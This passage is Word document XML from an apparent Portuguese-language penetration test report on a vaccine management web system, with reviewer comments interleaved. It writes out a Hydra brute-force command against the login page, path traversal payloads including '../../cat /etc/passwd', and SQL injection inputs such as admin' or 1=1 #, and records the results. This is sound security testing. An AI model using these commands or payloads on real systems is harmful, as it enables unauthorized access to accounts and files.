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DC7" w:rsidRPr="00A63EAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63EAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Resultados detalhados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008B447D" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B447D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nessa sessão, serão relatados, de forma detalhada, os resultados obtidos na execução dos testes em cada iteração planejada. Serão apresentados os passos utilizados para detectar possíveis vulnerabilidades, as vulnerabilidades encontradas e quais danos estas podem causar caso sejam exploradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A63EAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="993" w:hanging="284"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63EAA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Iteração 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00191402" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="24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1.1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00191402">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tela Login - Exploração via Força Bruta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 1hora e 20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Utilizar a ferramenta Hydra para adivinhar, por tentativa e erro, um login de um usuário e senha válidos para efetuar login no Sistema de Vacinas para verificar se a tela de Login não é vulnerável a ataques de força bruta.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Configurar a Hydra com 3 parâmetros para que ela realize os testes de acesso com força bruta na tela de Login.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 w:rsidRPr="00D44803">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Impedimento</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44803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 Hydra não está reclamando de 3 parâmetros quando, a tela de Login só utiliza 2.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Indefinido.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>Inserir um login de usuário válido e possíveis senhas mais comuns utilizadas para acesso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de um sistema </w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">e ser </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>bloqueado de alguma forma.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>Configurar o número de 16 tentativas de acesso na ferramenta Hydra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00CD0164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D9D9D9" w:themeColor="background1" w:themeShade="D9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hydra -l admin -P forcaBruta IP_do_servidor http-post-form “vacina/login.php:login=^USER^:senha=^PASS^:logado=false”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6E7A00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login utilizado no momento. Nesse caso, deve ser sempre “admin”, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pois foi o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“-P” aponta para o arquivo contendo as senhas que a Hydra tentará utilizar para fazer o login;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alvo;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“vacina/login.php:login=^USER^:senha=^PASS^:logado=false”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requisição.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</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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Configurar a ferramenta Hydra para executar tentativas utilizando o login “admin”, cadastrado na base de dados do sistema. Além disso, usar um dicionário de senhas retiradas da </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lista de Piores Senhas de 2015</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> da SplashData [1]. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00CD0164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D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se que o sistema possuísse algum tipo de controle.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hydra -l admin -P forcaBruta IP_do_servidor http-post-form “vacina/login.php:login=^USER^:senha=^PASS^:logado=false” -V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Pr="006E7A00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login utilizado no momento. Deve ser sempre admin, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pois é foi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“-P” aponta para o arquivo contendo as senhas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> que a Hydra tentará utilizar;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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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“-V” é para exibir no console o resultado da operação.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Não passou no teste. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Entretanto,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> a execução do teste mostrou que o sistema é vulnerável ao acesso via força </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bruta</w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. A Figura 1 mostra que embora várias tentativas tenham sido realizadas sem sucesso de login, o sistema permite que várias requisições sejam feitas ao servidor por tempo indeterminado. Como não há mecanismo de bloqueio para inúmeras requisições de login, o sistema abre uma brecha para que senhas de acesso ao sistema possam ser descobertas após várias tentativas.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7FC7BBFB" wp14:editId="2C83795B">
            <wp:extent cx="5686425" cy="4019550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="2" name="Imagem 2" descr="Descrição: resultadoHyd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ção: resultadoHydr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                                            Figura 1 - Resultado da operação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F018F3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1.2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F018F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tela Login - Exploração via Path Transversal</w:t>
      </w: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entre os dias 31/03/16 e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Duração: 2 horas e 30 minutos.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BC5B4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BC5B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Um scanner foi realizado através da ferramenta Burp Suite para identificar a estrutura de diretórios do sistema dentro do servidor.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Os resultados obtidos, conforme mostra a figura 2, foram utilizados para executar os testes deste tópico.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.</w:t>
      </w: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 wp14:anchorId="4AD3648F" wp14:editId="2AC5AD40">
            <wp:extent cx="5400040" cy="40214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tura diretorios aplicaca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Figura 2 - Resultado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Objetivo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94663B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Através dos parâmetros enviados pela URL e utilizados pela aplicação para realizar login, tentar navegar em diretórios da aplicação dentro do servidor. Dessa forma, conseguir acesso a locais não autorizados a um usuário do sistema. Foram utilizados os seguintes comandos “ ../../” para tentar realizar a navegação de pastas.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jc w:val="center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Quando o sistema não consegue efetuar um login, o seguinte parâmetro é exibido na url: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>vacina/login.php?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>logado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=false.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="0027155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>A primeira tentativa foi fazer uma requisição ao servidor alterando a url citada anteriormente para: v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">acina/login.php?logado=../../dir, </w:t>
      </w:r>
      <w:r w:rsidRPr="0094663B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O comando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dir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> no cmd do Windows serve para listar os arquivos e diretórios dentro da pasta atual.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 ../../cat /etc/passwd,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 w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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cat /etc/passwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, no sistema operacional Linux, serve para listar o conteúdo de passwd (local onde ficam armazenados informações de senha dos usuários). </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Como o sistema operacional do servidor em questão é Windows, então caso seja executado, o esperado seria um erro.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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vacina/login.php?logado=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e%2f%2e%2e%2f (código equivalente a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>../../)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">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5"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2844" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O comando  “../../” servem para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do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vacina/login.php?logado=../data.js </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">para acessar o arquivo “data.js”,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 “../”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema </w:t>
      </w:r>
      <w:r w:rsidRPr="001E119E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>operacional do servidor.</w:t>
      </w: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“data.js” foi um arquivo descoberto através do escaneamento realizado através do Burp Suite Intercept para mapear a estrutura de pastas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vacina/login.php?logado=./././ </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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3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vacina/login.php?login=teste&amp;senha=./././,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  <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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2832" w:firstLine="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC374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Pr="00FC374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vacina/login.php?login=teste&amp;senha</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">=.. 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D3B2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>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w: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Mapeamento da hierarquia de pastas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30/03/16.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Utilizar de forma automatizada o módulo Burp Spider da ferramenta Burp Suite para </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>realizar um reconhecimento da a hierarquia de diretórios do sistema armazenados dentro do servidor a partir da URL da tela de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Login: IP_do_servidor/vacina/login.php. A partir dos resultados, verificar se foi possível ter acesso à hierarquia de pastas do sistema mesmo sem efetuar a requisição do login. Além disso, verificar se é possível ter acesso aos códigos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Acessar a página do Login utilizando a url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0E26E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r w:rsidRPr="000E26E7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 xml:space="preserve">_do_servidor/vacina/login.php.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Esperava-se que o sistema não permitisse a visualização da hierarquia de pastas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Conforme mostra figura 3, não foi possível mapear a estrutura de pastas do sistema apenas acessando a página de Login.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bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C9427EB" wp14:editId="5ACC6100">
            <wp:extent cx="5490845" cy="4762500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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Cs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="002719E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 w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Figura 3 - Resultado tentativa de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72A0D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1.4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Exploração </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>v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>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40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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página de Login na tentativa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Login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85A8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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Entrada: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>admin’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Login.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[8,9 e 10] como entrada no campo Login, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao login de usuários cadastrados. Comentários inline foram utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.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Entradas: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r w:rsidRPr="00736DBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">admin’ or 1=1 #  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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736DBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">admin’ or 1=1  --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</w:p>
    <w:p w:rsidR="00594AD8" w:rsidRDefault="00594AD8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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Essa parte é muito explicativa pra um charter de testes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> sem contar que existe duplicação do mesmo texto em outros charters</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>, eu removeria.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594AD8" w:rsidRPr="00736DBC" w:rsidRDefault="00594AD8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highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">O envio desses dados como entrada no campo do Login, tenta forçar o sistema a consultar não apenas os dados do usuário </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">, mas de todos os usuários cadastrados na base de dados, uma vez que a instrução “1=1” será sempre verdadeira.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  <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Foi esperado que o sistema realizasse o tratamento de todos os caracteres informados como parâmetros regulares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Passou no teste. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.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594AD8" w:rsidRDefault="00594AD8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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Essa parte é muito explicativa pra um charter de testes, eu removeria.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594AD8" w:rsidRDefault="00594AD8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Inserir um texto fazendo uso de uma única aspa simples para completar a entrada de uma possível instrução SQL executada no momento do login no sistema. </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Nesse caso, é possível que uma instrução SQL de consulta semelhante a essa seja executada SELECT login from usuarios WHERE login = ‘admin’ or ‘a’=’a’.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Entradas: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admin’ or ‘a’=’a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594AD8" w:rsidRDefault="00594AD8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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Essa parte é muito explicativa pra um charter de testes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> sem contar que existe duplicação do mesmo texto em outros charters</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>, eu removeria.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594AD8" w:rsidRDefault="00594AD8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  <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">O envio desses dados como entrada no campo do Login, tenta forçar o sistema a consultar não apenas os dados do usuário </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>, mas de todos os usuários cadastrados na base de dados, uma vez que a instrução ‘a’=’a’ será sempre verdadeira.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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de todos os  caracteres informados como parâmetros regulares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teste.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4218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 aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.</w:t>
      </w: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A63EAA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A63EAA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Iteração 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A63EAA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A63EAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="285" w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63EAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1 Análise do Servidor - Exploração via Nmap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no dia 09/04/16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Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="001702C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Utilizar a ferramenta Nmap para descobrir quais portas estavam abertas no servidor e que </w:t>
      </w:r>
      <w:r w:rsidRPr="001702C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>atividade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00892814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>maliciosa</w:t>
      </w:r>
      <w:r w:rsidRPr="001702C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001702C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
